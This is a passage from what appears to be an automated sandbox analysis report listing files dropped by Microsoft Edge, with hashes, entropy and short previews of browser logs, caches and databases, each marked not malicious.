                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................Ou}b................next-map-id.1.Cnamespace-f2df52a8_64fc_47fc_9801_1235d6a23fa5-https://ntp.msn.com/.0..g.k................map-0-shd_sweeper8{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".g.h.o.l.d.o.u.t.".}...map-0-storageTest. .................. .................. .................. .................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.076470887942506
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxvX13cM+q2PcNwi23oH+TcwtrQMxIFUt8IXfxvRMWJZmw+IXfxaaWcMVkwOck:RP13cM+vLZYebCFUt86XJ/+66cMV54Zn
                                                                                                                                                                                                                                                                              MD5:32C2A24ABB7A91C336ADE05598438AA2
                                                                                                                                                                                                                                                                              SHA1:40C09BF507C06AE8F93588E96ACE21131D6FA236
                                                                                                                                                                                                                                                                              SHA-256:3B4625F6931F3685B66FB35E2C653AAFFFD4C6F454273656EF644A0AF464DBE7
                                                                                                                                                                                                                                                                              SHA-512:69F28072C240193F21594E7B5D2745BB5243C05384B49F2841E25D3EBFA9DFE461E8D1BE3450ACE7CBD698AA2C62FC00580258C978C701C72ABAC89AE119F89A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.402 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-02:42:13.404 1f8c Recovering log #3.2024/12/20-02:42:13.414 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                                                                              Entropy (8bit):5.076470887942506
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxvX13cM+q2PcNwi23oH+TcwtrQMxIFUt8IXfxvRMWJZmw+IXfxaaWcMVkwOck:RP13cM+vLZYebCFUt86XJ/+66cMV54Zn
                                                                                                                                                                                                                                                                              MD5:32C2A24ABB7A91C336ADE05598438AA2
                                                                                                                                                                                                                                                                              SHA1:40C09BF507C06AE8F93588E96ACE21131D6FA236
                                                                                                                                                                                                                                                                              SHA-256:3B4625F6931F3685B66FB35E2C653AAFFFD4C6F454273656EF644A0AF464DBE7
                                                                                                                                                                                                                                                                              SHA-512:69F28072C240193F21594E7B5D2745BB5243C05384B49F2841E25D3EBFA9DFE461E8D1BE3450ACE7CBD698AA2C62FC00580258C978C701C72ABAC89AE119F89A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.402 1f8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/20-02:42:13.404 1f8c Recovering log #3.2024/12/20-02:42:13.414 1f8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379154135195885

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1443
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8118343620498374
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:3384VWapsAF4unxS9tLp3X2amEtG1ChqwCEKYVy3QKkOAM4:3tFzFiXLp2FEkChTCnmbHOp
                                                                                                                                                                                                                                                                              MD5:3D8453BA95BF884985EF2F3A9BFA71FF
                                                                                                                                                                                                                                                                              SHA1:81429A332E856A1A0A60CE019C91C5BA94138EDF
                                                                                                                                                                                                                                                                              SHA-256:60CC2AD51B21C9CB4D399C249999477B7C8F23997716F79C469D1D4408B7F6FC
                                                                                                                                                                                                                                                                              SHA-512:582924EB1C2700DDD57D1544DB5D17C7B70F3057BDF7CA7E12D1795C0A68E3021668744680B908ACB86476608F6725FAFEB020F8C526944560549C284F953906
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SNSS........UF\............UF\......".UF\............UF\........UF\........UF\........UF\....!...UF\................................UF\.UF\1..,....UF\$...f2df52a8_64fc_47fc_9801_1235d6a23fa5....UF\........UF\....EnS.........UF\....UF\........................UF\....................5..0....UF\&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......UF\........UF\...........................UF\............UF\........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......c.$.)..d.$.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):355
                                                                                                                                                                                                                                                                              Entropy (8bit):5.160449120052655
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx04q2PcNwi23oH+Tcwt7Uh2ghZIFUt8IXfx9XZmw+IXfxgNDkwOcNwi23oH+Q:RjvLZYebIhHh2FUt86Z/+6M54ZYebIh9
                                                                                                                                                                                                                                                                              MD5:BC5B9C01E6AAE207EF3071109614A001
                                                                                                                                                                                                                                                                              SHA1:E9F52DBE43635215A222C590B8494E902FCDDB8D
                                                                                                                                                                                                                                                                              SHA-256:D1F065A90D2D49EC73AE8E1230881FF7B71F8EB1E73A536A13C12EAA7007D8FA
                                                                                                                                                                                                                                                                              SHA-512:759F8DF73E8034624AB957DDDD3256E117CDC9BCBF458906FFFF510698A8928A38F19874F9F9260A935567B6E6D08E2D9B108CE0086DE1BC7E3EC693C9A5C545
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.665 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-02:42:12.666 894 Recovering log #3.2024/12/20-02:42:12.667 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):355
                                                                                                                                                                                                                                                                              Entropy (8bit):5.160449120052655
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx04q2PcNwi23oH+Tcwt7Uh2ghZIFUt8IXfx9XZmw+IXfxgNDkwOcNwi23oH+Q:RjvLZYebIhHh2FUt86Z/+6M54ZYebIh9
                                                                                                                                                                                                                                                                              MD5:BC5B9C01E6AAE207EF3071109614A001
                                                                                                                                                                                                                                                                              SHA1:E9F52DBE43635215A222C590B8494E902FCDDB8D
                                                                                                                                                                                                                                                                              SHA-256:D1F065A90D2D49EC73AE8E1230881FF7B71F8EB1E73A536A13C12EAA7007D8FA
                                                                                                                                                                                                                                                                              SHA-512:759F8DF73E8034624AB957DDDD3256E117CDC9BCBF458906FFFF510698A8928A38F19874F9F9260A935567B6E6D08E2D9B108CE0086DE1BC7E3EC693C9A5C545
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.665 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/20-02:42:12.666 894 Recovering log #3.2024/12/20-02:42:12.667 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlu7Xl/:/M/xT02zZ71
                                                                                                                                                                                                                                                                              MD5:71BAA6A91D0DEF93AE7005132F9A8DCE
                                                                                                                                                                                                                                                                              SHA1:767A3CD96AFC693CF650164F23E49A5E404EC002
                                                                                                                                                                                                                                                                              SHA-256:AE0A05DD244981577B5216D7F50D8751FC79B0B5534478F081CE6F0294CEBF8F
                                                                                                                                                                                                                                                                              SHA-512:8BD1E3908C3BB7AE653605DAB344EA7E9464B6273ECB1B69D45B37E05679AB845A3E859285AF33D73A2C6EC4718A71362FEEFC4FFB8561BD7A4B34EB0D9E1D73
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                                                                              Entropy (8bit):5.220414391086673
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RrvLZYebvqBQFUt86P4/+6Bg54ZYebvqBvJ:BlYebvZg8GVoYebvk
                                                                                                                                                                                                                                                                              MD5:9822B89A1063AF00F6EB96A08D4A77AC
                                                                                                                                                                                                                                                                              SHA1:F05C63CB718210F6A914E8635ED1E3175C3CBFDB
                                                                                                                                                                                                                                                                              SHA-256:45F9ABC7CFEACC75DE1E964B0AB39EA1855F0B527C0E7140B00914FF17CCCA7B
                                                                                                                                                                                                                                                                              SHA-512:95A4E52AA3CED4A0AE18C5D7B73AA2A157656CF5E36C25C56A5D06962CDF5FE426066EC095D60DB5F794FF403CC66E0FECBAC699CFCFAE2B951870427DD2C4FE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.430 1f98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.436 1f98 Recovering log #3.2024/12/20-02:42:13.452 1f98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                                                                              Entropy (8bit):5.220414391086673
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:RrvLZYebvqBQFUt86P4/+6Bg54ZYebvqBvJ:BlYebvZg8GVoYebvk
                                                                                                                                                                                                                                                                              MD5:9822B89A1063AF00F6EB96A08D4A77AC
                                                                                                                                                                                                                                                                              SHA1:F05C63CB718210F6A914E8635ED1E3175C3CBFDB
                                                                                                                                                                                                                                                                              SHA-256:45F9ABC7CFEACC75DE1E964B0AB39EA1855F0B527C0E7140B00914FF17CCCA7B
                                                                                                                                                                                                                                                                              SHA-512:95A4E52AA3CED4A0AE18C5D7B73AA2A157656CF5E36C25C56A5D06962CDF5FE426066EC095D60DB5F794FF403CC66E0FECBAC699CFCFAE2B951870427DD2C4FE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:13.430 1f98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/20-02:42:13.436 1f98 Recovering log #3.2024/12/20-02:42:13.452 1f98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0248cc40-52d6-457a-992a-a13c052e4dd0.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                              MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                              SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                              SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                              SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF28998.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d4d266dc-2989-45c8-9a05-25e2151ab5dd.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[]

